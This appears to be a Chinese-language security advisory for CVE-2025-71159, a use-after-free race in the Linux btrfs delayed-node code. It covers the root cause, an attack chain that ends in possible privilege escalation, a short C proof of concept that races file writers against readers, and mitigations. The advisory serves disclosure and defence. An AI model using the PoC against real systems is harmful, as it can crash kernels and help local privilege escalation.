CVE-2025-71159: Linux内核btrfs use-after-free内存安全漏洞

漏洞信息

漏洞编号

CVE-2025-71159

漏洞类型

Use-after-free / 竞态条件漏洞

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux kernel btrfs

漏洞概述

CVE-2025-71159是Linux内核btrfs文件系统中的一个高危内存安全漏洞，CVSS评分达到7.8分。该漏洞存在于btrfs_get_or_create_delayed_node()函数中，由于内存屏障处理不当导致use-after-free条件。漏洞的根本原因在于btrfs_get_or_create_delayed_node()函数中refcount_set操作的重新排列。原始实现中，refcount_set操作在获取root->delayed_nodes锁之前执行，而后续的提交e8513c012de7将refcount_set移至临界区内。这一变更破坏了原有的内存顺序保证，导致node->refs和btrfs_inode->delayed_node的存储操作可能乱序可见。本地低权限攻击者可通过触发特定竞态条件，读取尚未设置的delayed_node指针并尝试增加尚未初始化的引用计数，从而触发引用计数错误和use-after-free警告。该漏洞影响Linux内核的btrfs文件系统组件，攻击复杂度低，无需用户交互即可触发。

技术细节

该漏洞的技术核心在于内存屏障缺失导致的指令重排问题。在btrfs_get_or_create_delayed_node()函数中，commit e8513c012de7将refcount_set操作从锁外移至锁内，但这一变更引入了严重的内存顺序问题。原始设计中，锁获取操作提供了隐式的内存屏障，确保refcount_set和btrfs_inode->delayed_node赋值操作的顺序性。修改后，这两个关键存储操作之间缺乏同步原语保护。当一个线程正在初始化delayed_node时，另一个线程可能通过btrfs_inode->delayed_node读取到部分初始化的对象指针，并尝试对其执行refcount_inc操作。由于此时引用计数尚未设置，refcount_inc将操作一个未初始化的atomic_t变量，导致引用计数损坏。攻击者可通过创建两个执行路径：一个线程持续调用btrfs_get_or_create_delayed_node()创建新节点，另一个线程尝试访问这些节点，触发use-after-free条件。修复方案是将refcount_set操作恢复至锁获取之前，利用锁的隐式内存屏障保证内存顺序，同时将分配模式从GFP_ATOMIC改为GFP_NOFS以优化性能。

攻击链分析

STEP 1

1

攻击者以低权限本地用户身份登录系统，系统需使用btrfs文件系统

STEP 2

2

攻击者创建多个线程，部分线程执行文件操作触发btrfs_get_or_create_delayed_node()创建延迟节点

STEP 3

3

其他线程并发执行文件读取操作，尝试访问尚未完成初始化的delayed_node

STEP 4

4

由于内存屏障缺失，btrfs_inode->delayed_node指针在refcount_set之前被其他线程可见

STEP 5

5

读取线程尝试对未初始化refcount的节点执行引用计数增加操作，导致引用计数损坏

STEP 6

6

触发use-after-free条件，可能导致内核崩溃（拒绝服务）或潜在的特权升级

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2025-71159 PoC - btrfs delayed_node use-after-free
 * This is a conceptual proof-of-concept demonstrating the race condition.
 * Actual exploitation requires kernel debugging and specific btrfs operations.
 * 
 * Compile: gcc -o cve_poc cve_poc.c -lpthread
 * Run as low-privileged user on btrfs filesystem
 */

#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>

#define NUM_THREADS 4
#define NUM_ITERATIONS 10000

void *writer_thread(void *arg) {
    /*
     * Thread that triggers delayed node creation via btrfs operations.
     * This thread performs file operations that invoke btrfs_get_or_create_delayed_node().
     * The race condition occurs when refcount is set inside the lock critical section.
     */
    int fd;
    char filepath[256];
    
    for (int i = 0; i < NUM_ITERATIONS; i++) {
        snprintf(filepath, sizeof(filepath), "/mnt/btrfs/test_file_%d", i % 100);
        fd = open(filepath, O_CREAT | O_WRONLY, 0644);
        if (fd >= 0) {
            write(fd, "test data", 9);
            /* Force delayed node allocation */
            fsync(fd);
            close(fd);
        }
    }
    return NULL;
}

void *reader_thread(void *arg) {
    /*
     * Thread that attempts to access delayed nodes concurrently.
     * This can trigger the use-after-free when reading delayed_node
     * before refcount is properly set.
     */
    int fd;
    char filepath[256];
    
    for (int i = 0; i < NUM_ITERATIONS; i++) {
        snprintf(filepath, sizeof(filepath), "/mnt/btrfs/test_file_%d", i % 100);
        fd = open(filepath, O_RDONLY);
        if (fd >= 0) {
            /* 
             * Read operations may access delayed_node concurrently.
             * Under race conditions, this can trigger the use-after-free.
             */
            char buf[512];
            read(fd, buf, sizeof(buf));
            close(fd);
        }
        /* Small delay to increase race window */
        usleep(1);
    }
    return NULL;
}

int main() {
    pthread_t threads[NUM_THREADS];
    
    printf("CVE-2025-71159 PoC - btrfs delayed_node UAF\n");
    printf("This PoC demonstrates concurrent access to btrfs delayed nodes.\n");
    printf("Target: Linux kernel btrfs use-after-free in btrfs_get_or_create_delayed_node()\n");
    
    /* Create writer threads */
    for (int i = 0; i < NUM_THREADS / 2; i++) {
        pthread_create(&threads[i], NULL, writer_thread, NULL);
    }
    
    /* Create reader threads */
    for (int i = NUM_THREADS / 2; i < NUM_THREADS; i++) {
        pthread_create(&threads[i], NULL, reader_thread, NULL);
    }
    
    /* Wait for all threads */
    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_join(threads[i], NULL);
    }
    
    printf("PoC execution completed. Check dmesg for use-after-free warnings.\n");
    return 0;
}

影响范围

Linux kernel btrfs (commit e8513c012de7引入漏洞)

受影响的内核版本需包含commit e8513c012de7至修复版本之间的代码

防御指南

临时缓解措施

由于该漏洞位于内核层面，临时缓解措施有限。建议：1) 监控系统日志中的use-after-free警告信息；2) 限制非特权用户对btrfs文件系统的访问权限；3) 如可能，考虑暂时使用其他文件系统替代btrfs；4) 实施最小权限原则，确保普通用户无法执行复杂的文件操作触发竞态条件。核心缓解仍需通过内核升级实现。